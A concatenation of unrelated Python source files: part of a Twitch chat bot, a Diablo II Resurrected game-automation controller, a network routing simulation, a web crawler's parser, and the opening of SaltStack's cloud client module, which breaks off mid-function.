# must send auth code
authCode = json.loads(msg[13:])
logger.debug("trying to authenticate with FFZ "+authCode)
MarathonBot.instance.message("#frankerfacezauthorizer", "AUTH "+authCode)
elif code == self.messageNumber and self.messageNumber < 5 and msg.split(" ")[0] == "ok":
# send the rest of the intro
if self.messageNumber == 1:
self.sendMessage('setuser %s' % json.dumps(self.channelName))
elif self.messageNumber == 2:
self.sendMessage('sub %s' % json.dumps('room.'+self.channelName))
elif self.messageNumber == 3:
self.sendMessage('sub %s' % json.dumps('channel.'+self.channelName))
else:
self.sendMessage('ready 0')
elif code >= 5 and self.messageNumber >= 5 and len(self.queuedChanges) > 0:
self.initDone = True
self.updateFollowButtons(self.queuedChanges[0])
self.queuedChanges = self.queuedChanges[1:]
elif code >= 5 and self.messageNumber >= 5 and msg.split(" ")[0] == "ok":
self.initDone = True
else:
# don't do anything immediately
pass
def on_error(self, error):
logger.debug("WS Error: "+error)
self.ws.close()
def on_close(self):
logger.debug("Websocket closed")
MarathonBot.instance.ffz = None
def updateFollowButtons(self, channels):
if not self.initDone:
self.queuedChanges.append(channels)
else:
self.sendMessage("update_follow_buttons %s" % json.dumps([self.channelName, channels]))
curg = db.cursor()
logger.info("Fetching channel list...")
curg.execute("SELECT name FROM channels")
channels = []
for row in curg.fetchall():
channels.append("#" + row[0])
logger.debug("Channels: %s", str(channels))
curg.close()
loadConfig()
# twitch api init
checkAndRenewAppAccessToken()
# get user data for the bot itself
headers = {"Authorization": "Bearer %s" % config["appAccessToken"]}
r = requests.get("https://api.twitch.tv/helix/users", headers=headers,
params={"login": str(config["username"]).lower()})
j = r.json()
try:
twitchid = j["data"][0]["id"]
except Exception:
twitchid = 0
config["twitchid"] = str(twitchid)
b = NepBot(config, channels)
b.start(config["oauth"])
# marathon bot?
if booleanConfig("marathonBotFunctions"):
maraBot = MarathonBot()
maraBot.start(config["marathonOAuth"])
logger.debug("past start")
pool.handle_forever()
|
game_controller.py
|
import os
import threading
import time
import cv2
from template_finder import TemplateFinder
from utils.auto_settings import check_settings
from bot import Bot
from config import Config
from death_manager import DeathManager
from game_recovery import GameRecovery
from game_stats import GameStats
from health_manager import HealthManager
from logger import Logger
from messenger import Messenger
from screen import Screen
from ui.char_selector import CharSelector
from utils.misc import kill_thread
from utils.restart import restart_game
from utils.misc import kill_thread, set_d2r_always_on_top, restore_d2r_window_visibility
class GameController:
is_running = False
def __init__(self, config: Config):
self._config = config
self.screen = None
self.template_finder = None
self.health_monitor_thread = None
self.health_manager = None
self.death_manager = None
self.death_monitor_thread = None
self.game_recovery = None
self.game_stats = None
self.game_controller_thread = None
self.bot_thread = None
self.bot = None
self.char_selector = None
def run_bot(self, pick_corpse: bool = False):
if self._config.general['restart_d2r_when_stuck']:
# Make sure the correct char is selected
if self.char_selector.has_char_template_saved():
Logger.info("Selecting original char")
self.char_selector.select_char()
else:
Logger.info("Saving top-most char as template")
self.char_selector.save_char_template()
# Start bot thread
self.bot = Bot(self.screen, self.game_stats, self.template_finder, pick_corpse)
self.bot_thread = threading.Thread(target=self.bot.start)
self.bot_thread.daemon = True
self.bot_thread.start()
# Register that thread to the death and health manager so they can stop the bot thread if needed
self.death_manager.set_callback(lambda: self.bot.stop() or kill_thread(self.bot_thread))
self.health_manager.set_callback(lambda: self.bot.stop() or kill_thread(self.bot_thread))
self.health_manager.set_belt_manager(self.bot.get_belt_manager())
do_restart = False
messenger = Messenger()
while 1:
self.health_manager.update_location(self.bot.get_curr_location())
max_game_length_reached = self.game_stats.get_current_game_length() > self._config.general["max_game_length_s"]
if max_game_length_reached or self.death_manager.died() or self.health_manager.did_chicken():
# Some debug and logging
if max_game_length_reached:
Logger.info(f"Max game length reached. Attempting to restart {self._config.general['name']}!")
if self._config.general["info_screenshots"]:
cv2.imwrite("./info_screenshots/info_max_game_length_reached_" + time.strftime("%Y%m%d_%H%M%S") + ".png", self.screen.grab())
elif self.death_manager.died():
self.game_stats.log_death(self.death_manager._last_death_screenshot)
elif self.health_manager.did_chicken():
self.game_stats.log_chicken(self.health_manager._last_chicken_screenshot)
self.bot.stop()
kill_thread(self.bot_thread)
# Try to recover from whatever situation we are and go back to hero selection
do_restart = self.game_recovery.go_to_hero_selection()
break
time.sleep(0.5)
self.bot_thread.join()
if do_restart:
# Reset flags before running a new bot
self.death_manager.reset_death_flag()
self.health_manager.reset_chicken_flag()
self.game_stats.log_end_game(failed=max_game_length_reached)
return self.run_bot(True)
else:
if self._config.general["info_screenshots"]:
cv2.imwrite("./info_screenshots/info_could_not_recover_" + time.strftime("%Y%m%d_%H%M%S") + ".png", self.screen.grab())
if self._config.general['restart_d2r_when_stuck']:
Logger.error("Could not recover from a max game length violation. Restarting the Game.")
if self._config.general["custom_message_hook"]:
messenger.send_message("Got stuck and will now restart D2R")
if restart_game(self._config.general["d2r_path"]):
self.game_stats.log_end_game(failed=max_game_length_reached)
if self.setup_screen():
self.start_health_manager_thread()
self.start_death_manager_thread()
self.game_recovery = GameRecovery(self.screen, self.death_manager, self.template_finder)
return self.run_bot(True)
Logger.error("Could not restart the game. Quitting.")
messenger.send_message("Got stuck and could not restart the game. Quitting.")
else:
Logger.error("Could not recover from a max game length violation. Quitting botty.")
if self._config.general["custom_message_hook"]:
messenger.send_message("Got stuck and will now quit botty")
os._exit(1)
def start(self):
# Check if we user should update the d2r settings
diff = check_settings(self._config)
if len(diff) > 0:
Logger.warning("Your D2R settings differ from the requiered ones. Please use Auto Settings to adjust them. The differences are:")
Logger.warning(f"{diff}")
if self._config.advanced_options['d2r_windows_always_on_top']:
set_d2r_always_on_top()
self.setup_screen()
self.template_finder = TemplateFinder(self.screen)
self.start_health_manager_thread()
self.start_death_manager_thread()
self.game_recovery = GameRecovery(self.screen, self.death_manager, self.template_finder)
self.game_stats = GameStats()
self.char_selector = CharSelector(self.screen, self._config, self.template_finder)
self.start_game_controller_thread()
GameController.is_running = True
def stop(self):
if self._config.advanced_options['d2r_windows_always_on_top']:
restore_d2r_window_visibility()
if self.death_monitor_thread: kill_thread(self.death_monitor_thread)
if self.health_monitor_thread: kill_thread(self.health_monitor_thread)
if self.bot_thread: kill_thread(self.bot_thread)
if self.game_controller_thread: kill_thread(self.game_controller_thread)
GameController.is_running = False
def setup_screen(self):
self.screen = Screen(self._config.general["monitor"])
if self.screen.found_offsets:
return True
return False
def start_health_manager_thread(self):
# Run health monitor thread
self.health_manager = HealthManager(self.screen, self.template_finder)
self.health_monitor_thread = threading.Thread(target=self.health_manager.start_monitor)
self.health_monitor_thread.daemon = True
self.health_monitor_thread.start()
def start_death_manager_thread(self):
# Run death monitor thread
self.death_manager = DeathManager(self.screen, self.template_finder)
self.death_monitor_thread = threading.Thread(target=self.death_manager.start_monitor)
self.death_monitor_thread.daemon = True
self.death_monitor_thread.start()
def start_game_controller_thread(self):
# Run game controller thread
self.game_controller_thread = threading.Thread(target=self.run_bot)
self.game_controller_thread.daemon = False
self.game_controller_thread.start()
def toggle_pause_bot(self):
if self.bot: self.bot.toggle_pause()
|
simulation_3.py
|
'''
Created on Oct 12, 2016
@author: mwittie
'''
# modified by Keely Wiesbeck and Alex Harry
import network_3
import link_3
import threading
from time import sleep
##configuration parameters
router_queue_size = 0 # 0 means unlimited
simulation_time = 10 # give the network sufficient time to transfer all packets before quitting
if __name__ == '__main__':
object_L = [] # keeps track of objects, so we can kill their threads
# create network nodes
host_1 = network_3.Host(1)
object_L.append(host_1)
host_2 = network_3.Host(2)
object_L.append(host_2)
# in router forward {i is the in interface, x is the out interface} what i will determine where to route to
# created routing tables, pass into the routers
# 0 (host 1)is the first in interface passes to out interface 0 (Router B)
# {host to end/or start at: out interface}
routing_table_a = {3: 0, 4: 1}
router_a = network_3.Router(routing_table_a, name='A', intf_count=2, max_queue_size=router_queue_size)
object_L.append(router_a)
routing_table_b = {3: 0, 4: 0}
router_b = network_3.Router(routing_table_b, name='B', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_b)
routing_table_c = {3: 0, 4: 0}
router_c = network_3.Router(routing_table_c, name='C', intf_count=1, max_queue_size=router_queue_size)
object_L.append(router_c)
routing_table_d = {3: 0, 4: 1}
router_d = network_3.Router(routing_table_d, name='D', intf_count=2, max_queue_size=router_queue_size)
object_L.append(router_d)
host_3 = network_3.Host(3)
object_L.append(host_3)
host_4 = network_3.Host(4)
object_L.append(host_4)
# create a Link Layer to keep track of links between network nodes
link_layer = link_3.LinkLayer()
object_L.append(link_layer)
# add all the links
# link parameters: from_node, from_intf_num, to_node, to_intf_num, mtu
# out interface of client, in interface of server
# 50 is the MTU - largest size of packet that can be transferred over links
link_layer.add_link(link_3.Link(host_1, 0, router_a, 0, 50))
link_layer.add_link(link_3.Link(host_2, 0, router_a, 1, 50))
link_layer.add_link(link_3.Link(router_a, 0, router_b, 0, 50))
link_layer.add_link(link_3.Link(router_a, 1, router_c, 0, 50))
link_layer.add_link(link_3.Link(router_b, 0, router_d, 0, 50))
link_layer.add_link(link_3.Link(router_c, 0, router_d, 1, 50))
link_layer.add_link(link_3.Link(router_d, 0, host_3, 0, 50))
link_layer.add_link(link_3.Link(router_d, 1, host_4, 0, 50))
# start all the objects
thread_L = []
thread_L.append(threading.Thread(name=host_1.__str__(), target=host_1.run))
thread_L.append(threading.Thread(name=host_2.__str__(), target=host_2.run))
thread_L.append(threading.Thread(name=host_3.__str__(), target=host_3.run))
thread_L.append(threading.Thread(name=host_4.__str__(), target=host_4.run))
thread_L.append(threading.Thread(name=router_a.__str__(), target=router_a.run))
thread_L.append(threading.Thread(name=router_b.__str__(), target=router_b.run))
thread_L.append(threading.Thread(name=router_c.__str__(), target=router_c.run))
thread_L.append(threading.Thread(name=router_d.__str__(), target=router_d.run))
thread_L.append(threading.Thread(name="Network", target=link_layer.run))
for t in thread_L:
t.start()
# create some send events
# host 1 to host 3
# host 2 to host 4
for i in range(3):
message = 'this is data message %d' % i
# if statement to change which host to send to (host 3 or host 4)
if i == 0 or i == 2:
host_1.udt_send(3, message)
print("Destination host: 3")
else:
host_2.udt_send(4, message)
print("Destination host: 4")
# give the network sufficient time to transfer all packets before quitting
sleep(simulation_time)
# join all threads
for o in object_L:
o.stop = True
for t in thread_L:
t.join()
print("All simulation threads joined")
# writes to host periodically
|
parser.py
|
import os
import re
import urllib
from threading import Thread
from urllib import parse
from myqueue.Context import Context
from myqueue.contentqueue import ContentQueue
from myqueue.savequeue import SaveQueue
from concurrent.futures import ThreadPoolExecutor
from myqueue.urlqueue import UrlQueue
import copy
class parser:
"""
该类是用来解析网页内容,获得link或者content
"""
def __init__(self):
self.url_queue = UrlQueue()
self.content_queue = ContentQueue()
self.save_queue = SaveQueue()
self.kernal = None
def _get_item_from_content(self):
return self.content_queue.move()
def _add_item_to_content(self, context):
self.content_queue.add(context)
def _add_item_from_save(self, context):
self.save_queue.add(context)
def active(self, kernel):
"""
激活解析核
:param kernel:
:return:
"""
self.kernal = kernel
def parse(self):
"""
开始解析内容
:return:
"""
def LinkWrap(context):
url = context.url
content = context.content
url_list = self.kernal.LinkExtract(content)
self.url_queue.add_all([Context(url=u, pre_url=url) for u in url_list])
def ContentWrap(context):
url = context.url
content = context.content
content_list = self.kernal.ContentExtract(content)
for c in content_list:
self.save_queue.add(Context(url=url, content=c[2], time=c[1], title=c[0]))
while True:
try:
content = self._get_item_from_content()
except IndexError:
continue
# LinkWrap(content)
# ContentWrap(content)
link = Thread(target=LinkWrap, args=(content, ))
con = Thread(target=ContentWrap, args=(content, ))
link.start()
con.start()
|
__init__.py
|
# -*- coding: utf-8 -*-
"""
The top level interface used to translate configuration data back to the
correct cloud modules
"""
# Import python libs
from __future__ import absolute_import, generators, print_function, unicode_literals
import copy
import glob
import logging
import multiprocessing
import os
import signal
import sys
import time
import traceback
from itertools import groupby
import salt.client
# Import salt libs
import salt.config
import salt.loader
import salt.syspaths
import salt.utils.args
import salt.utils.cloud
import salt.utils.context
import salt.utils.crypt
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.files
import salt.utils.user
import salt.utils.verify
import salt.utils.yaml
# Import salt.cloud libs
from salt.exceptions import (
SaltCloudConfigError,
SaltCloudException,
SaltCloudNotFound,
SaltCloudSystemExit,
)
from salt.ext import six
from salt.ext.six.moves import input # pylint: disable=import-error,redefined-builtin
from salt.template import compile_template
# Import third party libs
try:
import Cryptodome.Random
except ImportError:
try:
import Crypto.Random
except ImportError:
pass # pycrypto < 2.1
# Get logging started
log = logging.getLogger(__name__)
def communicator(func):
"""Warning, this is a picklable decorator !"""
def _call(queue, args, kwargs):
"""called with [queue, args, kwargs] as first optional arg"""
kwargs["queue"] = queue
ret = None
try:
ret = func(*args, **kwargs)
queue.put("END")
except KeyboardInterrupt as ex:
trace = traceback.format_exc()
queue.put("KEYBOARDINT")
queue.put("Keyboard interrupt")
queue.put("{0}\n{1}\n".format(ex, trace))
except Exception as ex: # pylint: disable=broad-except
trace = traceback.format_exc()
queue.put("ERROR")
queue.put("Exception")
queue.put("{0}\n{1}\n".format(ex, trace))
return ret
return _call
def enter_mainloop(
target,
mapped_args=None,
args=None,
kwargs=None,
pool=None,
pool_size=None,
callback=None,
queue=None,
):
"""
Manage a multiprocessing pool
- If the queue does not output anything, the pool runs indefinitely
- If the queue returns KEYBOARDINT or ERROR, this will kill the pool
totally calling terminate & join and ands with a SaltCloudSystemExit
exception notifying callers from the abnormal termination
- If the queue returns END or callback is defined and returns True,
it just join the process and return the data.
target
the function you want to execute in multiproccessing
pool
pool object can be None if you want a default pool, but you ll
have then to define pool_size instead
pool_size
pool size if you did not provide yourself a pool
callback
a boolean taking a string in argument which returns True to
signal that 'target' is finished and we need to join
the pool
queue
A custom multiproccessing queue in case you want to do
extra stuff and need it later in your program
args
positional arguments to call the function with
if you don't want to use pool.map
mapped_args
a list of one or more arguments combinations to call the function with
e.g. (foo, [[1], [2]]) will call::
foo([1])
foo([2])
kwargs
kwargs to give to the function in case of process
Attention, the function must have the following signature:
target(queue, *args, **kw)
You may use the 'communicator' decorator to generate such a function
(see end of this file)
"""
if not kwargs:
kwargs = {}
if not pool_size:
pool_size = 1
if not pool:
pool = multiprocessing.Pool(pool_size)
if not queue:
manager = multiprocessing.Manager()
queue = manager.Queue()
if mapped_args is not None and not mapped_args:
msg = (
"We are called to asynchronously execute {0}"
" but we do no have anything to execute, weird,"
" we bail out".format(target)
)
log.error(msg)
raise SaltCloudSystemExit("Exception caught\n{0}".format(msg))
elif mapped_args is not None:
iterable = [[queue, [arg], kwargs] for arg in mapped_args]
ret = pool.map(func=target, iterable=iterable)
else:
ret = pool.apply(target, [queue, args, kwargs])
while True:
test = queue.get()
if test in ["ERROR", "KEYBOARDINT"]:
type_ = queue.get()
trace = queue.get()
msg = "Caught {0}, terminating workers\n".format(type_)
msg += "TRACE: {0}\n".format(trace)
log.error(msg)
pool.terminate()
pool.join()
raise SaltCloudSystemExit("Exception caught\n{0}".format(msg))
elif test in ["END"] or (callback and callback(test)):
pool.close()
pool.join()
break
else:
time.sleep(0.125)
return ret
class CloudClient(object):
"""
The client class to wrap cloud interactions
"""
def __init__(self, path=None, opts=None, config_dir=None, pillars=None):
if opts:
self.opts = opts
else:
self.opts = salt.config.cloud_config(path)
# Check the cache-dir exists. If not, create it.
v_dirs = [self.opts["cachedir"]]
salt.utils.verify.verify_env(v_dirs, salt.utils.user.get_user())
if pillars:
for name, provider in six.iteritems(pillars.pop("providers", {})):
driver = provider["driver"]
provider["profiles"] = {}
self.opts["providers"].update({name: {driver: provider}})
for name, profile in six.iteritems(pillars.pop("profiles", {})):
provider = profile["provider"].split(":")[0]
driver = next(six.iterkeys(self.opts["providers"][provider]))
profile["provider"] = "{0}:{1}".format(provider, driver)
profile["profile"] = name
self.opts["profiles"].update({name: profile})
self.opts["providers"][provider][driver]["profiles"].update(
{name: profile}
)
for name, map_dct in six.iteritems(pillars.pop("maps", {})):
if "maps" not in self.opts:
self.opts["maps"] = {}
self.opts["maps"][name] = map_dct
self.opts.update(pillars)
def _opts_defaults(self, **kwargs):
"""
Set the opts dict to defaults and allow for opts to be overridden in
the kwargs
"""
# Let's start with the default salt cloud configuration
opts = salt.config.DEFAULT_CLOUD_OPTS.copy()
# Update it with the loaded configuration
opts.update(self.opts.copy())
# Reset some of the settings to sane values
opts["parallel"] = False
opts["keep_tmp"] = False
opts["deploy"] = True
opts["update_bootstrap"] = False
opts["show_deploy_args"] = False
opts["script_args"] = ""
# Update it with the passed kwargs
if "kwargs" in kwargs:
opts.update(kwargs["kwargs"])
opts.update(kwargs)
profile = opts.get("profile", None)
# filter other profiles if one is specified
if profile:
tmp_profiles = opts.get("profiles", {}).copy()
for _profile in [a for a in tmp_profiles]:
if not _profile == profile:
tmp_profiles.pop(_profile)
# if profile is specified and we have enough info about providers
# also filter them to speedup methods like
# __filter_non_working_providers
providers = [
a.get("provider", "").split(":")[0]
for a in six.itervalues(tmp_profiles)
if a.get("provider", "")
]
if providers:
_providers = opts.get("providers", {})
for provider in _providers.copy():
if provider not in providers:
_providers.pop(provider)
return opts
def low(self, fun, low):
"""
Pass the cloud function and low data structure to run
"""
l_fun = getattr(self, fun)
f_call = salt.utils.args.format_call(l_fun, low)
return l_fun(*f_call.get("args", ()), **f_call.get("kwargs", {}))
def list_sizes(self, provider=None):
"""
List all available sizes in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.size_list(provider))
def list_images(self, provider=None):
"""
List all available images in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.image_list(provider))
def list_locations(self, provider=None):
"""
List all available locations in configured cloud systems
"""
mapper = salt.cloud.Map(self._opts_defaults())
return salt.utils.data.simple_types_filter(mapper.location_list(provider))
def query(self, query_type="list_nodes"):
"""
Query basic instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes"
return mapper.map_providers_parallel(query_type)
def full_query(self, query_type="list_nodes_full"):
"""
Query all instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_full"
return mapper.map_providers_parallel(query_type)
def select_query(self, query_type="list_nodes_select"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_select"
return mapper.map_providers_parallel(query_type)
def min_query(self, query_type="list_nodes_min"):
"""
Query select instance information
"""
mapper = salt.cloud.Map(self._opts_defaults())
mapper.opts["selected_query_option"] = "list_nodes_min"
return mapper.map_providers_parallel(query_type)
def profile(self, profile, names, vm_overrides=None, **kwargs):
"""
Pass in a profile to create, names is a list of vm names to allocate
vm_overrides is a special dict that will be per node options
overrides
Example:
.. code-block:: python
>>> client= salt.cloud.CloudClient(path='/etc/salt/cloud')
>>> client.profile('do_512_git', names=['minion01',])
{'minion01': {'backups_active': 'False',
'created_at': '2014-09-04T18:10:15Z',
'droplet': {'event_id': 31000502,
'id': 2530006,
'image_id': 5140006,
'name': 'minion01',
'size_id': 66},
'id': '2530006',
'image_id': '5140006',
'ip_address': '107.XXX.XXX.XXX',
'locked': 'True',
'name': 'minion01',
'private_ip_address': None,
'region_id': '4',
'size_id': '66',
'status': 'new'}}
"""
if not vm_overrides:
vm_overrides = {}
kwargs["profile"] = profile
mapper = salt.cloud.Map(self._opts_defaults(**kwargs))
if isinstance(names, six.string_types):
names = names.split(",")
return salt.utils.data.simple_types_filter(
mapper.run_profile(profile, names, vm_overrides=vm_overrides)
)
def map_run(self, path=None, **kwargs):
"""
To execute a map
"""
kwarg = {}
if path:
kwarg["map"] = path
kwarg.update(kwargs)
mapper = salt.cloud.Map(self._opts_defaults(**kwarg))
dmap = mapper.map_data()
return salt.utils.data.simple_types_filter(mapper.run_map(dmap))
def destroy(self, names):
"""
Destroy the named VMs
"""
mapper = salt.cloud.Map(self._opts_defaults(destroy=True))
if isinstance(names, six.string_types):
names = names.split(",")
return salt.utils.data.simple_types_filter(mapper.destroy(names))
def create(self, provider, names, **kwargs):
"""
Create the named VMs, without using a profile
Example:
.. code-block:: python
client.create(provider='my-ec2-config', names=['myinstance'],
image='ami-1624987f', size='t1.micro', ssh_username='ec2-user',
securitygroup='default', delvol_on_destroy=True)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = self.opts["providers"]
if provider in providers:
provider += ":{0}".format(next(six.iterkeys(providers[provider])))
else:
return False
if isinstance(names, six.string_types):
names = names.split(",")
ret = {}
for name in names:
vm_ = kwargs.copy()
vm_["name"] = name
vm_["driver"] = provider
# This function doesn't require a profile, but many cloud drivers
# check for profile information (which includes the provider key) to
# help with config file debugging and setting up instances. Setting
# the profile and provider defaults here avoids errors in other
# cloud functions relying on these keys. See SaltStack Issue #41971
# and PR #38166 for more information.
vm_["profile"] = None
vm_["provider"] = provider
ret[name] = salt.utils.data.simple_types_filter(mapper.create(vm_))
return ret
def extra_action(self, names, provider, action, **kwargs):
"""
Perform actions with block storage devices
Example:
.. code-block:: python
client.extra_action(names=['myblock'], action='volume_create',
provider='my-nova', kwargs={'voltype': 'SSD', 'size': 1000}
)
client.extra_action(names=['salt-net'], action='network_create',
provider='my-nova', kwargs={'cidr': '192.168.100.0/24'}
)
"""
mapper = salt.cloud.Map(self._opts_defaults())
providers = mapper.map_providers_parallel()
if provider in providers:
provider += ":{0}".format(next(six.iterkeys(providers[provider])))
else:
return False
if isinstance(names, six.string_types):
names = names.split(",")
ret = {}
for name in names:
extra_ = kwargs.copy()
extra_["name"] = name
extra_["provider"] = provider
extra_["profile"] = None
extra_["action"] = action
ret[name] = salt.utils.data.simple_types_filter(mapper.extras(extra_))
return ret
def action(
self,
fun=None,
cloudmap=None,
names=None,
provider=None,
instance=None,
kwargs=None,
):
"""
Execute a single action via the cloud plugin backend
Examples:
.. code-block:: python
client.action(fun='show_instance', names=['myinstance'])
client.action(fun='show_image', provider='my-ec2-config',
kwargs={'image': 'ami-10314d79'}
)
"""
if kwargs is None:
kwargs = {}
mapper = salt.cloud.Map(self._opts_defaults(action=fun, names=names, **kwargs))
if instance:
if names:
raise SaltCloudConfigError(
"Please specify either a list of 'names' or a single "
"'instance', but not both."
)
names = [instance]
if names and not provider:
self.opts["action"] = fun
return mapper.do_action(names, kwargs)
if provider and not names:
return mapper.do_function(provider, fun, kwargs)
else:
# This should not be called without either an instance or a
# provider. If both an instance/list of names and a provider
# are given, then we also need to exit. We can only have one
# or the other.
raise SaltCloudConfigError(
"Either an instance (or list of names) or a provider must be "
"specified, but not both."
)
class Cloud(object):
"""
An object for the creation of new VMs
"""
def __init__(self, opts):
self.opts = opts
self.clouds = salt.loader.clouds(self.opts)
self.__filter_non_working_providers()
self.__cached_provider_queries = {}
def get_configured_providers(self):
"""
Return the configured providers
"""
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
if len(drivers) > 1:
for driver in drivers:
providers.add("{0}:{1}".format(alias, driver))
continue
providers.add(alias)
return providers
def lookup_providers(self, lookup):
"""
Get a dict describing the configured providers
"""
if lookup is None:
lookup = "all"
if lookup == "all":
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver in drivers:
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit("There are no cloud providers configured.")
return providers
if ":" in lookup:
alias, driver = lookup.split(":")
if (
alias not in self.opts["providers"]
or driver not in self.opts["providers"][alias]
):
raise SaltCloudSystemExit(
"No cloud providers matched '{0}'. Available: {1}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
providers = set()
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver in drivers:
if lookup in (alias, driver):
providers.add((alias, driver))
if not providers:
raise SaltCloudSystemExit(
"No cloud providers matched '{0}'. "
"Available selections: {1}".format(
lookup, ", ".join(self.get_configured_providers())
)
)
return providers
def lookup_profiles(self, provider, lookup):
"""
Return a dictionary describing the configured profiles
"""
if provider is None:
provider = "all"
if lookup is None:
lookup = "all"
if lookup == "all":
profiles = set()
provider_profiles = set()
for alias, info in six.iteritems(self.opts["profiles"]):
providers = info.get("provider")
if providers:
given_prov_name = providers.split(":")[0]
salt_prov_name = providers.split(":")[1]
if given_prov_name == provider:
provider_profiles.add((alias, given_prov_name))
elif salt_prov_name == provider:
provider_profiles.add((alias, salt_prov_name))
profiles.add((alias, given_prov_name))
if not profiles:
raise SaltCloudSystemExit("There are no cloud profiles configured.")
if provider != "all":
return provider_profiles
return profiles
def map_providers(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
pmap = {}
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver, details in six.iteritems(drivers):
fun = "{0}.{1}".format(driver, query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
if alias not in pmap:
pmap[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
pmap[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for "
"running nodes: %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any
# nodes
pmap[alias][driver] = []
self.__cached_provider_queries[query] = pmap
return pmap
def map_providers_parallel(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
Same as map_providers but query in parallel.
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
opts = self.opts.copy()
multiprocessing_data = []
# Optimize Providers
opts["providers"] = self._optimize_providers(opts["providers"])
for alias, drivers in six.iteritems(opts["providers"]):
# Make temp query for this driver to avoid overwrite next
this_query = query
for driver, details in six.iteritems(drivers):
# If driver has function list_nodes_min, just replace it
# with query param to check existing vms on this driver
# for minimum information, Otherwise still use query param.
if (
opts.get("selected_query_option") is None
and "{0}.list_nodes_min".format(driver) in self.clouds
):
this_query = "list_nodes_min"
fun = "{0}.{1}".format(driver, this_query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
multiprocessing_data.append(
{
"fun": fun,
"opts": opts,
"query": this_query,
"alias": alias,
"driver": driver,
}
)
output = {}
if not multiprocessing_data:
return output
data_count = len(multiprocessing_data)
pool = multiprocessing.Pool(
data_count < 10 and data_count or 10, init_pool_worker
)
parallel_pmap = enter_mainloop(
_run_parallel_map_providers_query, multiprocessing_data, pool=pool
)
for alias, driver, details in parallel_pmap:
if not details:
# There's no providers details?! Skip it!
continue
if alias not in output:
output[alias] = {}
output[alias][driver] = details
self.__cached_provider_queries[query] = output
return output
def get_running_by_names(
self, names, query="list_nodes", cached=False, profile=None
):
if isinstance(names, six.string_types):
names = [names]
matches = {}
handled_drivers = {}
mapped_providers = self.map_providers_parallel(query, cached=cached)
for alias, drivers in six.iteritems(mapped_providers):
for driver, vms in six.iteritems(drivers):
if driver not in handled_drivers:
handled_drivers[driver] = alias
# When a profile is specified, only return an instance
# that matches the provider specified in the profile.
# This solves the issues when many providers return the
# same instance. For example there may be one provider for
# each availability zone in amazon in the same region, but
# the search returns the same instance for each provider
# because amazon returns all instances in a region, not
# availability zone.
if (
profile
and alias
not in self.opts["profiles"][profile]["provider"].split(":")[0]
):
continue
for vm_name, details in six.iteritems(vms):
# XXX: The logic below can be removed once the aws driver
# is removed
if vm_name not in names:
continue
elif (
driver == "ec2"
and "aws" in handled_drivers
and "aws" in matches[handled_drivers["aws"]]
and vm_name in matches[handled_drivers["aws"]]["aws"]
):
continue
elif (
driver == "aws"
and "ec2" in handled_drivers
and "ec2" in matches[handled_drivers["ec2"]]
and vm_name in matches[handled_drivers["ec2"]]["ec2"]
):
continue
if alias not in matches:
matches[alias] = {}
if driver not in matches[alias]:
matches[alias][driver] = {}
matches[alias][driver][vm_name] = details
return matches
def _optimize_providers(self, providers):
"""
Return an optimized mapping of available providers
"""
new_providers = {}
provider_by_driver = {}
for alias, driver in six.iteritems(providers):
for name, data in six.iteritems(driver):
if name not in provider_by_driver:
provider_by_driver[name] = {}
provider_by_driver[name][alias] = data
for driver, providers_data in six.iteritems(provider_by_driver):
fun = "{0}.optimize_providers".format(driver)
if fun not in self.clouds:
log.debug("The '%s' cloud driver is unable to be optimized.", driver)
for name, prov_data in six.iteritems(providers_data):
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
continue
new_data = self.clouds[fun](providers_data)
if new_data:
for name, prov_data in six.iteritems(new_data):
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
return new_providers
def location_list(self, lookup="all"):
"""
Return a mapping of all location data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_locations".format(driver)
if fun not in self.clouds:
# The capability to gather locations is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the locations information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def image_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_images".format(driver)
if fun not in self.clouds:
# The capability to gather images is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the images information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
